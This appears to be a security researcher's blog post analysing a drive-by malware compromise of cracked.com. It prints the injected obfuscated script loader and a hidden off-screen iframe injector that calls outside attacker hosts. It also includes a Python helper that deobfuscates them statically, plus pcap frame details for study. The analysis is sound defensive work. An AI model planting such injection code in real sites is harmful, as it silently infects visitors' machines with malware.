On 2013-11-10 one of our research systems discovered that the website cracked.com was hosting a drive-by download that resulted in malware being installed on vulnerable systems that visited the site. As with the php.net compromise that we posted about a few weeks ago, a very popular site serving malware can quickly compromise a large number of users. According to Alexa, cracked.com comes in as the 650th most popular site in the world, and 289th in the US, meaning thousands of visitors were exposed.
var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");
This writes a script tag that sends a request to crackedcdm.com, a domain registered on 2013-11-04, which means we can assume that those responsible had the ability to serve their content from cracked.com at least that early.
From there a hidden iframe is inserted pointing to p68ei5.degreeexplore.biz:
var urla='http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html';var divTag=document.createElement('div');divTag.id='ad3';document.body.appendChild(divTag);var fr3=document.createElement('iframe');fr3.width='88px';fr3.height='31px';fr3.setAttribute('style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');fr3.setAttribute('src',urla);document.getElementById('ad3').appendChild(fr3);
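Both injected snippets above rely on the same two tricks: a string-concatenation loader that only reveals its script URL when the pieces are joined, and a 1x1-style iframe pushed off screen with `left: -8000px`. The following Python is an added analysis helper, not code from the original post or from cracked.com; it statically resolves the concatenation in the first snippet (no JavaScript engine is run) and pulls the iframe source and positioning out of the second, so a responder can triage a page copy without rendering it. The two `LOADER` and `INJECTOR` strings are copies of the snippets quoted above with straight quotes; the function names and the "offscreen" heuristic are my own.

```python
import re

# Copies of the two injected snippets quoted in the post (constructed input, straight quotes).
LOADER = (
    'var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; '
    'var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";'
    'document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"'
    '+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");'
)
INJECTOR = (
    "var urla='http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html';"
    "var divTag=document.createElement('div');divTag.id='ad3';document.body.appendChild(divTag);"
    "var fr3=document.createElement('iframe');fr3.width='88px';fr3.height='31px';"
    "fr3.setAttribute('style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');"
    "fr3.setAttribute('src',urla);document.getElementById('ad3').appendChild(fr3);"
)

# `var name = "literal";` declarations; only plain string literals are collected.
VAR_RE = re.compile(r"var\s+(\w+)\s*=\s*(['\"])(.*?)\2\s*;")
WRITE_RE = re.compile(r"document\.write\((.*)\)\s*;?\s*$", re.S)
SRC_RE = re.compile(r"src\s*=\s*[\"']?([^\s\"'>]+)")


def collect_vars(snippet):
    """Map every string-literal variable declared in the snippet to its value."""
    return {m.group(1): m.group(3) for m in VAR_RE.finditer(snippet)}


def resolve_concat(expr, env):
    """Evaluate a '+'-joined expression of string literals and variable names.

    This is a tiny scanner, not eval(): anything other than a quoted literal,
    a known variable name, whitespace or '+' raises, so unexpected constructs
    are surfaced rather than executed. Escaped quotes inside literals are not
    handled (none appear in these samples).
    """
    out, i, n = [], 0, len(expr)
    while i < n:
        c = expr[i]
        if c.isspace() or c == "+":
            i += 1
        elif c in "'\"":
            j = expr.index(c, i + 1)          # closing quote of the literal
            out.append(expr[i + 1:j])
            i = j + 1
        else:
            m = re.match(r"\w+", expr[i:])
            if not m or m.group(0) not in env:
                raise ValueError(f"unresolvable token at offset {i}: {expr[i:i + 12]!r}")
            out.append(env[m.group(0)])
            i += m.end()
    return "".join(out)


def deobfuscate_write(snippet):
    """Return the markup a document.write() loader would emit."""
    m = WRITE_RE.search(snippet)
    if not m:
        raise ValueError("no document.write() call found")
    return resolve_concat(m.group(1), collect_vars(snippet))


def extract_script_src(markup):
    """Pull the src URL out of the reconstructed <script> tag."""
    m = SRC_RE.search(markup)
    return m.group(1) if m else None


def analyse_iframe_injector(snippet):
    """Recover the iframe's src/size/style and flag off-screen placement."""
    env = collect_vars(snippet)
    created = re.search(r"(\w+)\s*=\s*document\.createElement\(\s*['\"]iframe['\"]\s*\)", snippet)
    if not created:
        return None
    var = created.group(1)
    attrs = {}
    # fr3.setAttribute('name', value);  -- value may be a literal or a variable
    for m in re.finditer(rf"{var}\.setAttribute\(\s*(['\"])(\w+)\1\s*,\s*(.*?)\)\s*;", snippet):
        attrs[m.group(2)] = resolve_concat(m.group(3), env)
    # fr3.width='88px';  -- direct property assignments
    for m in re.finditer(rf"{var}\.(\w+)\s*=\s*(.*?);", snippet):
        attrs[m.group(1)] = resolve_concat(m.group(2), env)
    style = attrs.get("style", "")
    # Heuristic: a left/top offset of hundreds of pixels or more is off screen.
    offscreen = bool(re.search(r"(?:left|top)\s*:\s*-\d{3,}px", style))
    return {"src": attrs.get("src"), "width": attrs.get("width"),
            "height": attrs.get("height"), "offscreen": offscreen}


if __name__ == "__main__":
    tag = deobfuscate_write(LOADER)
    print("stage 1 writes:", tag)
    print("stage 1 loads :", extract_script_src(tag))
    print("stage 2 iframe:", analyse_iframe_injector(INJECTOR))
```

The deliberate choice here is to resolve the concatenation with a scanner instead of handing the string to a JavaScript engine: an analyst's machine should never execute attacker script, and the scanner fails loudly on any construct it does not understand, which is itself a useful signal that a sample has changed.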
As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by virustotal.com.
Further details of the behavior of the malware itself can be seen at https://malwr.com/analysis/MGE1MWZmYjY3Y2IxNDM2Y2IwY2JhZDdmMjEzYTQwOTc/
Here is a link to the full pcap (50c691bad0ba43d4370e2be0dd873e83, 4.3M) for your own further analysis/study. It seems that, intentionally or otherwise, the attackers employed some techniques to make packet analysis a bit more difficult than usual, so be prepared to go a bit beyond your standard methodology.
We attempted to contact cracked.com with this information, but unfortunately they provide no security contact information on their website, their email@example.com bounces, and so far they have not responded to messages to their twitter account. So if you know anyone involved in running that site they might appreciate you sharing this post with them.
A few more details about the pcap since we've had some questions.
Frame number 66 is the response from cracked.com (after a redirect). You can see the malicious JS inserted along with their twitter feed, line 1645 if you extract the text response, or search for “paddingLeftFooter twitterLogo” and you'll find it.
The request to /i.php on crackedcdm.com begins in frame 1251.
The exploits and the payload are delivered from p68ei5.degreeexplore.biz in multiple requests beginning at frames 1495, 2565, 2567, 2581, and several others. If you're exploring, the easiest way to see this part is to use http contains "p68ei5.degreeexplore.biz" as your Wireshark filter.
One of the site administrators (David Wong) of cracked.com has posted to their forums that the team fixed the problem Tuesday afternoon. hxxp://www.cracked.com/forums/index.php?topic=144437.msg2757527#msg2757527
It seems as though the site being compromised and serving malware has been a recurring problem for cracked.com, each time met with a somewhat lax approach on their forums: "Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?" This, combined with not alerting their site visitors so that they know what has happened and what remediation steps they can take to clean up their systems, tends to indicate that cracked.com should be avoided if you're concerned with malware.